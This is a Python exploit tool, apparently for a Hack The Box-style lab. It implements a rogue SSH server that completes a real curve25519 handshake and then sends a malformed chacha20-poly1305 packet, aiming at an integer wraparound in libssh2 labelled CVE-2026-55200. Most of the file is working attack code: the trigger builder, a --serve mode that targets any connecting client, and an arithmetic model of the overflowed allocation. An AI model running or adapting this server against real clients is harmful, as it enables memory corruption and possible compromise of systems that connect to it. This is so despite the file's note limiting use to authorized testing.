#!/usr/bin/env python3
"""Minimal SSH server that sends a malformed chacha20-poly1305 packet.

The server completes a curve25519 key exchange with a single client and then
sends one encrypted packet whose decrypted length field (``--packet-length``)
does not match the short encrypted body that follows it.  ``--self-test`` and
``--loopback-test`` exercise the packet generator and the handshake locally
without needing a real client.

The CLI describes this as an HTB-style libssh2 test harness; use it only
against clients you are authorized to test.
"""
import argparse
import hashlib
import hmac
import os
import queue
import socket
import struct
import sys
import threading
import time
import traceback
from dataclasses import dataclass

from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa, x25519

# Listen address defaults are intentionally empty; --serve requires both to be set.
HOST = ""
PORT = 0

SERVER_IDENT = b"SSH-2.0-libpwn-cve-2026-55200"
LIBSSH2_PACKET_MAXPAYLOAD = 35000
DEFAULT_PACKET_LENGTH = 0xFFFFFFFF
DEFAULT_AUTH_LEN = 16
DEFAULT_MAC_LEN = 0
CLIENT_IDENT = b"SSH-2.0-libpwn-local-libssh2-mock"

KEX_ALGORITHMS = [
    "curve25519-sha256",
    "curve25519-sha256@libssh.org",
]
HOSTKEY_ALGORITHMS = [
    "rsa-sha2-256",
    "ssh-rsa",
]
CIPHER_ALGORITHMS = [
    "chacha20-poly1305@openssh.com",
]
MAC_ALGORITHMS = [
    "hmac-sha2-256",
    "hmac-sha1",
]
COMP_ALGORITHMS = [
    "none",
]


# ---------------------------------------------------------------------------
# SSH wire-format helpers
# ---------------------------------------------------------------------------

def u32(value):
    """Pack *value* as a big-endian uint32, truncating it to 32 bits."""
    return struct.pack(">I", value & 0xFFFFFFFF)


def read_exact(sock, size):
    """Read exactly *size* bytes from *sock*.

    Raises:
        EOFError: if the peer closes the connection before *size* bytes arrive.
    """
    out = bytearray()
    while len(out) < size:
        chunk = sock.recv(size - len(out))
        if not chunk:
            raise EOFError("connection closed while reading")
        out += chunk
    return bytes(out)


def ssh_string(data):
    """Encode *data* (``str`` is UTF-8 encoded) as an SSH ``string`` (uint32 length + bytes)."""
    if isinstance(data, str):
        data = data.encode()
    return u32(len(data)) + data


def ssh_name_list(items):
    """Encode an iterable of names as a comma-separated SSH ``name-list``."""
    return ssh_string(",".join(items).encode())


def mpint_bytes(value):
    """Return the body of an SSH ``mpint`` for a non-negative integer.

    Zero encodes as an empty body.  A leading zero byte is added when the top
    bit is set, so the value is not read as negative.
    """
    if value == 0:
        return b""
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return raw


def ssh_mpint(value):
    """Encode a non-negative integer as a length-prefixed SSH ``mpint``."""
    return ssh_string(mpint_bytes(value))


def read_ssh_string(buf, offset):
    """Parse an SSH ``string`` at *offset* in *buf*.

    Returns:
        ``(body, next_offset)``.

    Raises:
        ValueError: if the length prefix or the body runs past the end of *buf*.
    """
    if offset + 4 > len(buf):
        raise ValueError("short SSH string length")
    size = struct.unpack(">I", buf[offset:offset + 4])[0]
    offset += 4
    if offset + size > len(buf):
        raise ValueError("short SSH string body")
    return buf[offset:offset + size], offset + size


def split_namelist(raw):
    """Decode a raw ``name-list`` body into a list of names (empty body -> [])."""
    if not raw:
        return []
    return raw.decode(errors="strict").split(",")


def first_match(client_items, server_items, label):
    """Return the first entry of *client_items* that also appears in *server_items*.

    The client's preference order wins, as in RFC 4253 algorithm negotiation.

    Raises:
        RuntimeError: if there is no common entry.
    """
    for item in client_items:
        if item in server_items:
            return item
    raise RuntimeError(f"client did not offer required {label}; got {client_items!r}")


# ---------------------------------------------------------------------------
# Unencrypted binary packet protocol (before NEWKEYS)
# ---------------------------------------------------------------------------

def build_plain_packet(payload, block_size=8):
    """Wrap *payload* in an unencrypted SSH binary packet with random padding.

    The total length is padded to a multiple of *block_size*, with at least
    4 bytes of padding as RFC 4253 section 6 requires.
    """
    padding_len = (-(len(payload) + 5)) % block_size
    if padding_len < 4:
        padding_len += block_size
    packet_length = len(payload) + 1 + padding_len
    return u32(packet_length) + bytes([padding_len]) + payload + os.urandom(padding_len)


def parse_plain_packet(packet):
    """Return the payload of a complete unencrypted packet (length field included).

    Raises:
        ValueError: on a truncated packet, a length mismatch or bad padding.
    """
    if len(packet) < 5:
        raise ValueError("plain packet too short")
    packet_length = struct.unpack(">I", packet[:4])[0]
    padding_len = packet[4]
    if packet_length + 4 != len(packet):
        raise ValueError("packet length mismatch")
    if padding_len + 1 > packet_length:
        raise ValueError("invalid padding length")
    return packet[5:4 + packet_length - padding_len]


def read_plain_packet(sock, max_packet=1024 * 1024):
    """Read one unencrypted packet from *sock* and return its payload.

    Raises:
        ValueError: if the announced length is 0 or exceeds *max_packet*.
    """
    packet_length = struct.unpack(">I", read_exact(sock, 4))[0]
    if packet_length < 1 or packet_length > max_packet:
        raise ValueError(f"refusing plain packet_length={packet_length}")
    body = read_exact(sock, packet_length)
    return parse_plain_packet(u32(packet_length) + body)


def send_plain_packet(sock, payload):
    """Send *payload* as a single unencrypted packet."""
    sock.sendall(build_plain_packet(payload))


def read_ident(sock):
    """Read lines until one starting with ``SSH-`` and return it without CR/LF.

    The banner is read one byte at a time on purpose, so that no bytes of the
    following binary packet are consumed.  Non-``SSH-`` lines are skipped.

    Raises:
        ValueError: if a single line exceeds 4096 bytes.
    """
    buf = bytearray()
    while True:
        ch = read_exact(sock, 1)
        if ch == b"\n":
            line = bytes(buf).rstrip(b"\r")
            if line.startswith(b"SSH-"):
                return line
            buf.clear()
            continue
        buf += ch
        if len(buf) > 4096:
            raise ValueError("SSH banner line too long")


def build_kexinit_payload():
    """Build an SSH_MSG_KEXINIT (20) payload advertising this module's algorithm lists."""
    payload = bytearray()
    payload.append(20)
    payload += os.urandom(16)  # cookie
    payload += ssh_name_list(KEX_ALGORITHMS)
    payload += ssh_name_list(HOSTKEY_ALGORITHMS)
    payload += ssh_name_list(CIPHER_ALGORITHMS)  # client-to-server
    payload += ssh_name_list(CIPHER_ALGORITHMS)  # server-to-client
    payload += ssh_name_list(MAC_ALGORITHMS)
    payload += ssh_name_list(MAC_ALGORITHMS)
    payload += ssh_name_list(COMP_ALGORITHMS)
    payload += ssh_name_list(COMP_ALGORITHMS)
    payload += ssh_string(b"")  # languages client-to-server
    payload += ssh_string(b"")  # languages server-to-client
    payload += b"\x00"  # first_kex_packet_follows = False
    payload += u32(0)  # reserved
    return bytes(payload)


def parse_kexinit_payload(payload):
    """Parse an SSH_MSG_KEXINIT payload into its algorithm name-lists.

    Ten name-lists are read (the two language lists included), but only the
    first eight are returned.

    Raises:
        ValueError: if the message type is not 20 or a list is truncated.
    """
    if not payload or payload[0] != 20:
        raise ValueError("expected SSH_MSG_KEXINIT")
    offset = 17  # 1-byte message type + 16-byte cookie
    names = []
    for _ in range(10):
        raw, offset = read_ssh_string(payload, offset)
        names.append(split_namelist(raw))
    return {
        "kex": names[0],
        "hostkey": names[1],
        "c2s_cipher": names[2],
        "s2c_cipher": names[3],
        "c2s_mac": names[4],
        "s2c_mac": names[5],
        "c2s_comp": names[6],
        "s2c_comp": names[7],
    }


# ---------------------------------------------------------------------------
# Key exchange
# ---------------------------------------------------------------------------

def rsa_public_blob(private_key, algorithm):
    """Encode the RSA public key as ``string algorithm || mpint e || mpint n``."""
    numbers = private_key.public_key().public_numbers()
    return (
        ssh_string(algorithm)
        + ssh_string(mpint_bytes(numbers.e))
        + ssh_string(mpint_bytes(numbers.n))
    )


def sign_exchange_hash(private_key, hostkey_algorithm, exchange_hash):
    """Sign *exchange_hash* with RSA PKCS#1 v1.5 and return the SSH signature blob.

    ``rsa-sha2-256`` uses SHA-256 and ``ssh-rsa`` uses SHA-1.

    Raises:
        ValueError: for any other *hostkey_algorithm*.
    """
    if hostkey_algorithm == "rsa-sha2-256":
        digest = hashes.SHA256()
    elif hostkey_algorithm == "ssh-rsa":
        digest = hashes.SHA1()
    else:
        raise ValueError(f"unsupported hostkey signature algorithm {hostkey_algorithm}")
    sig = private_key.sign(exchange_hash, padding.PKCS1v15(), digest)
    return ssh_string(hostkey_algorithm) + ssh_string(sig)


def exchange_hash(client_ident, server_ident, client_kexinit, server_kexinit,
                  hostkey_blob, client_pub, server_pub, shared_int):
    """Compute the curve25519-sha256 exchange hash H (SHA-256 over the KEX transcript)."""
    h = bytearray()
    h += ssh_string(client_ident)
    h += ssh_string(server_ident)
    h += ssh_string(client_kexinit)
    h += ssh_string(server_kexinit)
    h += ssh_string(hostkey_blob)
    h += ssh_string(client_pub)
    h += ssh_string(server_pub)
    h += ssh_mpint(shared_int)
    return hashlib.sha256(bytes(h)).digest()


def derive_key(shared_int, exchange_hash_value, session_id, letter, length):
    """Derive *length* bytes of key material as in RFC 4253 section 7.2.

    K1 = SHA256(K || H || letter || session_id).  The output is then extended
    with SHA256(K || H || K1 || ... || Kn) until *length* bytes are available.
    """
    seed = ssh_mpint(shared_int) + exchange_hash_value + letter + session_id
    out = hashlib.sha256(seed).digest()
    while len(out) < length:
        out += hashlib.sha256(ssh_mpint(shared_int) + exchange_hash_value + out).digest()
    return out[:length]


# ---------------------------------------------------------------------------
# chacha20-poly1305@openssh.com (pure Python)
# ---------------------------------------------------------------------------

def rotl32(value, shift):
    """Rotate a 32-bit word left by *shift* bits."""
    return ((value << shift) & 0xFFFFFFFF) | (value >> (32 - shift))


def quarter_round(state, a, b, c, d):
    """Apply the ChaCha quarter-round to words a, b, c, d of *state* in place."""
    state[a] = (state[a] + state[b]) & 0xFFFFFFFF
    state[d] = rotl32(state[d] ^ state[a], 16)
    state[c] = (state[c] + state[d]) & 0xFFFFFFFF
    state[b] = rotl32(state[b] ^ state[c], 12)
    state[a] = (state[a] + state[b]) & 0xFFFFFFFF
    state[d] = rotl32(state[d] ^ state[a], 8)
    state[c] = (state[c] + state[d]) & 0xFFFFFFFF
    state[b] = rotl32(state[b] ^ state[c], 7)


def chacha20_block(key, counter, nonce8):
    """Return one 64-byte ChaCha20 keystream block.

    Uses the original layout (64-bit block counter and 64-bit nonce), which is
    the one chacha20-poly1305@openssh.com uses.
    """
    constants = b"expand 32-byte k"
    state = [
        int.from_bytes(constants[i:i + 4], "little")
        for i in range(0, 16, 4)
    ]
    state += [
        int.from_bytes(key[i:i + 4], "little")
        for i in range(0, 32, 4)
    ]
    state += [
        counter & 0xFFFFFFFF,
        (counter >> 32) & 0xFFFFFFFF,
        int.from_bytes(nonce8[:4], "little"),
        int.from_bytes(nonce8[4:], "little"),
    ]
    working = state[:]
    for _ in range(10):  # 10 double rounds = 20 rounds
        quarter_round(working, 0, 4, 8, 12)
        quarter_round(working, 1, 5, 9, 13)
        quarter_round(working, 2, 6, 10, 14)
        quarter_round(working, 3, 7, 11, 15)
        quarter_round(working, 0, 5, 10, 15)
        quarter_round(working, 1, 6, 11, 12)
        quarter_round(working, 2, 7, 8, 13)
        quarter_round(working, 3, 4, 9, 14)
    return b"".join(
        ((working[i] + state[i]) & 0xFFFFFFFF).to_bytes(4, "little")
        for i in range(16)
    )


def chacha20_xor(key, counter, nonce8, data):
    """XOR *data* with the ChaCha20 keystream, starting at block *counter*."""
    out = bytearray()
    block_counter = counter
    for offset in range(0, len(data), 64):
        stream = chacha20_block(key, block_counter, nonce8)
        chunk = data[offset:offset + 64]
        out += bytes(a ^ b for a, b in zip(chunk, stream))
        block_counter = (block_counter + 1) & 0xFFFFFFFFFFFFFFFF
    return bytes(out)


def poly1305_mac(message, key):
    """Compute the 16-byte Poly1305 tag of *message* under a 32-byte one-time *key*."""
    r = int.from_bytes(key[:16], "little")
    r &= 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF  # clamp r
    s = int.from_bytes(key[16:], "little")
    p = (1 << 130) - 5
    acc = 0
    for offset in range(0, len(message), 16):
        block = message[offset:offset + 16]
        # Appending 0x01 sets the bit just above the block, including for a short final block.
        n = int.from_bytes(block + b"\x01", "little")
        acc = ((acc + n) * r) % p
    return ((acc + s) & ((1 << 128) - 1)).to_bytes(16, "little")


def chachapoly_encrypt(key64, seqno, plaintext_without_tag):
    """Encrypt one packet with chacha20-poly1305@openssh.com and append the tag.

    Bytes 32..63 of *key64* encrypt the 4-byte length field.  Bytes 0..31
    encrypt the rest starting at block 1, and block 0 supplies the Poly1305
    key.  The 64-bit big-endian *seqno* is the nonce.

    Raises:
        ValueError: if *key64* is not 64 bytes or the packet has no length field.
    """
    if len(key64) != 64:
        raise ValueError("chacha20-poly1305@openssh.com requires a 64-byte key")
    if len(plaintext_without_tag) < 4:
        raise ValueError("packet needs a 4-byte SSH packet_length")
    seq = seqno.to_bytes(8, "big")
    main_key = key64[:32]
    header_key = key64[32:]
    encrypted_len = chacha20_xor(header_key, 0, seq, plaintext_without_tag[:4])
    encrypted_body = chacha20_xor(main_key, 1, seq, plaintext_without_tag[4:])
    encrypted = encrypted_len + encrypted_body
    poly_key = chacha20_xor(main_key, 0, seq, b"\x00" * 64)[:32]
    return encrypted + poly1305_mac(encrypted, poly_key)


def chachapoly_decrypt(key64, seqno, encrypted_with_tag):
    """Verify and decrypt a packet produced by :func:`chachapoly_encrypt`.

    Raises:
        ValueError: if the key is not 64 bytes, the input is shorter than a
            length field plus tag, or the Poly1305 tag does not verify.
    """
    if len(key64) != 64:
        raise ValueError("chacha20-poly1305@openssh.com requires a 64-byte key")
    if len(encrypted_with_tag) < 20:
        raise ValueError("encrypted packet too short")
    seq = seqno.to_bytes(8, "big")
    main_key = key64[:32]
    header_key = key64[32:]
    encrypted = encrypted_with_tag[:-16]
    tag = encrypted_with_tag[-16:]
    poly_key = chacha20_xor(main_key, 0, seq, b"\x00" * 64)[:32]
    expected = poly1305_mac(encrypted, poly_key)
    # Constant-time comparison so verification time does not depend on the tag bytes.
    if not hmac.compare_digest(expected, tag):
        raise ValueError("poly1305 tag mismatch")
    packet_len = chacha20_xor(header_key, 0, seq, encrypted[:4])
    body = chacha20_xor(main_key, 1, seq, encrypted[4:])
    return packet_len + body


# ---------------------------------------------------------------------------
# Malformed trigger packet
# ---------------------------------------------------------------------------

def build_malformed_plain(packet_length, body_len):
    """Build the plaintext trigger: a *packet_length* header and a short *body_len* body.

    The body is a padding_length byte of 4 followed by ``body_len - 1`` filler
    bytes, regardless of the announced *packet_length*.

    Raises:
        ValueError: if *body_len* < 1.
    """
    if body_len < 1:
        raise ValueError("body_len must be at least 1 so padding_length exists")
    return u32(packet_length) + bytes([4]) + b"A" * (body_len - 1)


def build_malformed_wire(key64, seqno, packet_length, body_len, filler_len):
    """Encrypt the trigger and append *filler_len* unencrypted ``B`` bytes after the tag."""
    plain = build_malformed_plain(packet_length, body_len)
    return chachapoly_encrypt(key64, seqno, plain) + (b"B" * filler_len)


# ---------------------------------------------------------------------------
# Arithmetic model of the length check
# ---------------------------------------------------------------------------

@dataclass
class ArithmeticResult:
    """Outcome of modelling the 32-bit length check for one packet_length."""

    accepted: bool  # the wrapped total passes 0 < total <= LIBSSH2_PACKET_MAXPAYLOAD
    total32: int  # 4 + packet_length + mac_len + auth_len, reduced mod 2**32
    allocation: int  # total32 when accepted, else 0
    fixed_rejects: bool  # packet_length > LIBSSH2_PACKET_MAXPAYLOAD
    fullpacket_copy_len: int  # packet_length - 1, reduced mod 2**32
    gap: int  # how far fullpacket_copy_len exceeds allocation (0 if it does not)


def model_vulnerable_c_expression(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN):
    """Model ``4 + (packet_length + mac_len + auth_len)`` in uint32 arithmetic.

    Each addition wraps mod 2**32.  With the defaults, packet_length
    0xFFFFFFFF wraps to a total of 19, which passes the size check even though
    the fixed check (``packet_length > LIBSSH2_PACKET_MAXPAYLOAD``) rejects it.
    """
    rhs32 = (packet_length + mac_len + auth_len) & 0xFFFFFFFF
    total32 = (4 + rhs32) & 0xFFFFFFFF
    accepted = packet_length >= 1 and 0 < total32 <= LIBSSH2_PACKET_MAXPAYLOAD
    fixed_rejects = packet_length > LIBSSH2_PACKET_MAXPAYLOAD
    copy_len = (packet_length - 1) & 0xFFFFFFFF
    gap = copy_len - total32 if accepted and copy_len > total32 else 0
    return ArithmeticResult(accepted, total32, total32 if accepted else 0,
                            fixed_rejects, copy_len, gap)


def model_vulnerable32(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN):
    """Same model as :func:`model_vulnerable_c_expression`, with the sum written flat.

    Wrapping addition mod 2**32 is associative, so the results are identical.
    This function delegates so the two models cannot drift apart.
    """
    return model_vulnerable_c_expression(packet_length, mac_len, auth_len)


# ---------------------------------------------------------------------------
# Server
# ---------------------------------------------------------------------------

class MiniSSHExploitServer:
    """Single-connection SSH server that completes KEX and then sends the trigger."""

    def __init__(self, args):
        """Store parsed CLI *args* and generate a fresh 2048-bit RSA host key."""
        self.args = args
        self.host_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    def serve_once(self):
        """Listen on the configured IPv4 address, accept one client and handle it."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((self.args.listen_host, self.args.listen_port))
            listener.listen(1)
            actual_host, actual_port = listener.getsockname()
            print(f"[+] listening on {actual_host}:{actual_port}")
            conn, addr = listener.accept()
            with conn:
                conn.settimeout(self.args.timeout)
                print(f"[+] client connected from {addr[0]}:{addr[1]}")
                self.handle_client(conn)

    def handle_client(self, conn):
        """Run the server side of the handshake on *conn*, then send the trigger.

        Outgoing packets are counted in ``seq_out`` because the
        chacha20-poly1305 nonce for the first encrypted packet is that count.
        """
        seq_out = 0
        seq_in = 0

        # Version exchange.
        conn.sendall(SERVER_IDENT + b"\r\n")
        client_ident = read_ident(conn)
        print(f"[+] client ident: {client_ident.decode(errors='replace')}")

        # Algorithm negotiation: every direction must support our single choices.
        client_kexinit = read_plain_packet(conn)
        seq_in += 1
        client_lists = parse_kexinit_payload(client_kexinit)
        chosen_kex = first_match(client_lists["kex"], KEX_ALGORITHMS, "kex")
        chosen_hostkey = first_match(client_lists["hostkey"], HOSTKEY_ALGORITHMS, "hostkey")
        first_match(client_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server-to-client cipher")
        first_match(client_lists["c2s_cipher"], CIPHER_ALGORITHMS, "client-to-server cipher")
        first_match(client_lists["s2c_mac"], MAC_ALGORITHMS, "server-to-client mac")
        first_match(client_lists["c2s_mac"], MAC_ALGORITHMS, "client-to-server mac")
        first_match(client_lists["s2c_comp"], COMP_ALGORITHMS, "server-to-client compression")
        first_match(client_lists["c2s_comp"], COMP_ALGORITHMS, "client-to-server compression")
        print(f"[+] negotiated {chosen_kex} / {chosen_hostkey} / chacha20-poly1305@openssh.com")

        server_kexinit = build_kexinit_payload()
        send_plain_packet(conn, server_kexinit)
        seq_out += 1

        # curve25519 ECDH: SSH_MSG_KEX_ECDH_INIT (30) carries the 32-byte client key.
        init_payload = read_plain_packet(conn)
        seq_in += 1
        if not init_payload or init_payload[0] != 30:
            raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_INIT, got {init_payload[:1]!r}")
        client_pub, offset = read_ssh_string(init_payload, 1)
        if offset != len(init_payload) or len(client_pub) != 32:
            raise RuntimeError("invalid curve25519 client public key")

        server_private = x25519.X25519PrivateKey.generate()
        server_pub = server_private.public_key().public_bytes(
            serialization.Encoding.Raw,
            serialization.PublicFormat.Raw,
        )
        shared = server_private.exchange(x25519.X25519PublicKey.from_public_bytes(client_pub))
        if shared == b"\x00" * 32:
            raise RuntimeError("invalid all-zero curve25519 shared secret")
        shared_int = int.from_bytes(shared, "big")

        hostkey_blob = rsa_public_blob(self.host_key, chosen_hostkey)
        h = exchange_hash(client_ident, SERVER_IDENT, client_kexinit, server_kexinit,
                          hostkey_blob, client_pub, server_pub, shared_int)
        session_id = h  # first key exchange: session id is the exchange hash
        signature = sign_exchange_hash(self.host_key, chosen_hostkey, h)

        # SSH_MSG_KEX_ECDH_REPLY (31), then SSH_MSG_NEWKEYS (21).
        reply = b"\x1f" + ssh_string(hostkey_blob) + ssh_string(server_pub) + ssh_string(signature)
        send_plain_packet(conn, reply)
        seq_out += 1
        send_plain_packet(conn, b"\x15")
        seq_out += 1
        print("[+] sent SSH_MSG_NEWKEYS")

        # Best effort: the trigger is sent whether or not the client's NEWKEYS arrives.
        try:
            newkeys = read_plain_packet(conn)
            seq_in += 1
            if newkeys != b"\x15":
                print(f"[!] expected client NEWKEYS, got {newkeys[:1]!r}; continuing")
            else:
                print("[+] received client SSH_MSG_NEWKEYS")
        except Exception as exc:
            print(f"[!] did not read client NEWKEYS before trigger: {exc}")

        # Letter "D" selects the server-to-client encryption key (RFC 4253 section 7.2).
        key_s2c = derive_key(shared_int, h, session_id, b"D", 64)
        trigger_seq = seq_out
        wire = build_malformed_wire(
            key_s2c,
            trigger_seq,
            self.args.packet_length,
            self.args.body_len,
            self.args.filler_len,
        )
        conn.sendall(wire)
        print(f"[+] sent malformed chacha/poly1305 trigger at server seq={trigger_seq}")
        print(f"[+] trigger bytes={len(wire)} packet_length=0x{self.args.packet_length:08x}")
        # Keep the connection open briefly so the client processes the packet.
        time.sleep(self.args.hold_open)


# ---------------------------------------------------------------------------
# Local verification modes
# ---------------------------------------------------------------------------

def self_test(args):
    """Check the trigger packet round-trips and the arithmetic model wraps to 19.

    Raises:
        SystemExit: with a FAIL message if any check does not hold.
    """
    key = bytes(range(64))
    seqno = 3
    wire = build_malformed_wire(key, seqno, args.packet_length, args.body_len, args.filler_len)
    encrypted_part = wire[:-args.filler_len] if args.filler_len else wire
    decrypted = chachapoly_decrypt(key, seqno, encrypted_part)
    decoded_len = struct.unpack(">I", decrypted[:4])[0]
    arith = model_vulnerable_c_expression(args.packet_length, DEFAULT_MAC_LEN, DEFAULT_AUTH_LEN)

    print("[self-test] chacha20-poly1305@openssh.com packet generator")
    print(f"packet_length=0x{decoded_len:08x} ({decoded_len})")
    print(f"encrypted_fragment_len={len(encrypted_part)}")
    print(f"filler_len={args.filler_len}")
    print(f"body_len={args.body_len}")
    print(f"vulnerable_c_expression_accepted={arith.accepted}")
    print(f"vulnerable_c_expression_allocation={arith.allocation}")
    print(f"fixed_rejects={arith.fixed_rejects}")
    print(f"fullpacket_style_length={arith.fullpacket_copy_len}")
    print(f"allocation_gap={arith.gap}")

    if decoded_len != args.packet_length:
        raise SystemExit("[self-test] FAIL: decrypted packet_length mismatch")
    if not arith.accepted or arith.allocation != 19:
        raise SystemExit("[self-test] FAIL: arithmetic did not reach wrapped allocation=19")
    if not arith.fixed_rejects:
        raise SystemExit("[self-test] FAIL: fixed model did not reject oversized length")
    print("[self-test] PASS")


def loopback_client(client_sock, args):
    """Act as a minimal client against :meth:`MiniSSHExploitServer.handle_client`.

    The client performs the handshake (without verifying the host-key
    signature), derives the server-to-client key and decrypts the trigger.

    Returns:
        ``(decoded_packet_length, encrypted_fragment_len)``.
    """
    # The server sends KEXINIT, KEX_ECDH_REPLY and NEWKEYS in plaintext first,
    # so its first encrypted packet uses sequence number 3.
    trigger_seq = 3

    client_sock.settimeout(args.timeout)
    server_ident = read_ident(client_sock)
    if server_ident != SERVER_IDENT:
        raise RuntimeError(f"unexpected server ident {server_ident!r}")
    client_sock.sendall(CLIENT_IDENT + b"\r\n")

    client_kexinit = build_kexinit_payload()
    send_plain_packet(client_sock, client_kexinit)
    server_kexinit = read_plain_packet(client_sock)
    server_lists = parse_kexinit_payload(server_kexinit)
    first_match(server_lists["kex"], KEX_ALGORITHMS, "server kex")
    first_match(server_lists["hostkey"], HOSTKEY_ALGORITHMS, "server hostkey")
    first_match(server_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server cipher")

    client_private = x25519.X25519PrivateKey.generate()
    client_pub = client_private.public_key().public_bytes(
        serialization.Encoding.Raw,
        serialization.PublicFormat.Raw,
    )
    send_plain_packet(client_sock, b"\x1e" + ssh_string(client_pub))

    reply = read_plain_packet(client_sock)
    if not reply or reply[0] != 31:
        raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_REPLY, got {reply[:1]!r}")
    hostkey_blob, offset = read_ssh_string(reply, 1)
    server_pub, offset = read_ssh_string(reply, offset)
    _signature, offset = read_ssh_string(reply, offset)
    if offset != len(reply):
        raise RuntimeError("trailing data in KEX_ECDH_REPLY")

    shared = client_private.exchange(x25519.X25519PublicKey.from_public_bytes(server_pub))
    shared_int = int.from_bytes(shared, "big")
    h = exchange_hash(CLIENT_IDENT, SERVER_IDENT, client_kexinit, server_kexinit,
                      hostkey_blob, client_pub, server_pub, shared_int)
    key_s2c = derive_key(shared_int, h, h, b"D", 64)

    newkeys = read_plain_packet(client_sock)
    if newkeys != b"\x15":
        raise RuntimeError(f"expected server NEWKEYS, got {newkeys[:1]!r}")
    send_plain_packet(client_sock, b"\x15")

    # Length field + truncated body + 16-byte Poly1305 tag, then the filler.
    encrypted_len = 4 + args.body_len + 16
    encrypted = read_exact(client_sock, encrypted_len)
    if args.filler_len:
        read_exact(client_sock, args.filler_len)
    decrypted = chachapoly_decrypt(key_s2c, trigger_seq, encrypted)
    decoded_len = struct.unpack(">I", decrypted[:4])[0]
    if decoded_len != args.packet_length:
        raise RuntimeError("loopback decrypted packet_length mismatch")
    return decoded_len, encrypted_len


def loopback_test(args):
    """Run the server in a thread over a socketpair and check the trigger end to end.

    Raises:
        SystemExit: if the server thread does not finish in time.
        Exception: whatever the server thread raised, re-raised here.
    """
    left, right = socket.socketpair()
    result_queue = queue.Queue()

    def server_thread():
        try:
            with left:
                left.settimeout(args.timeout)
                MiniSSHExploitServer(args).handle_client(left)
            result_queue.put(None)
        except Exception as exc:
            result_queue.put(exc)

    thread = threading.Thread(target=server_thread, daemon=True)
    thread.start()
    try:
        with right:
            decoded_len, encrypted_len = loopback_client(right, args)
    finally:
        thread.join(args.timeout + args.hold_open + 1)

    if thread.is_alive():
        raise SystemExit("[loopback-test] FAIL: server thread did not exit")
    server_error = result_queue.get_nowait()
    if server_error is not None:
        raise server_error

    print("[loopback-test] minimal SSH handshake/key-derivation path")
    print(f"decrypted_trigger_packet_length=0x{decoded_len:08x} ({decoded_len})")
    print(f"encrypted_trigger_fragment_len={encrypted_len}")
    print("[loopback-test] PASS")


def main():
    """Parse CLI arguments and dispatch to --self-test, --loopback-test or --serve."""
    parser = argparse.ArgumentParser(
        description="Minimal malicious SSH server/trigger for HTB-style libssh2 CVE-2026-55200 testing."
    )
    parser.add_argument("--self-test", action="store_true",
                        help="verify local packet crypto and CVE arithmetic")
    parser.add_argument("--loopback-test", action="store_true",
                        help="verify the local SSH handshake and encrypted trigger path")
    parser.add_argument("--serve", action="store_true",
                        help="listen for one libssh2 client and send the trigger")
    parser.add_argument("--listen-host", default=HOST,
                        help="listen IP/interface, e.g. 0.0.0.0")
    parser.add_argument("--listen-port", type=int, default=PORT,
                        help="listen port, e.g. 2222")
    parser.add_argument("--packet-length", type=lambda x: int(x, 0), default=DEFAULT_PACKET_LENGTH)
    parser.add_argument("--body-len", type=int, default=8,
                        help="truncated encrypted body length after the 4-byte length field")
    parser.add_argument("--filler-len", type=int, default=64,
                        help="extra bytes after the valid encrypted fragment/tag")
    parser.add_argument("--timeout", type=float, default=10.0)
    parser.add_argument("--hold-open", type=float, default=1.0)
    args = parser.parse_args()

    # Reject values that would otherwise fail deep inside packet generation
    # (body_len < 1), or make self_test slice the wire incorrectly (negative filler).
    if args.body_len < 1:
        parser.error("--body-len must be at least 1")
    if args.filler_len < 0:
        parser.error("--filler-len must be non-negative")

    if args.self_test:
        self_test(args)
        return
    if args.loopback_test:
        loopback_test(args)
        return
    if args.serve:
        if not args.listen_host or not args.listen_port:
            raise SystemExit("set --listen-host and --listen-port; the HOST/PORT section is intentionally open")
        MiniSSHExploitServer(args).serve_once()
        return
    parser.print_help()


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        raise
    except Exception:
        traceback.print_exc()
        sys.exit(1)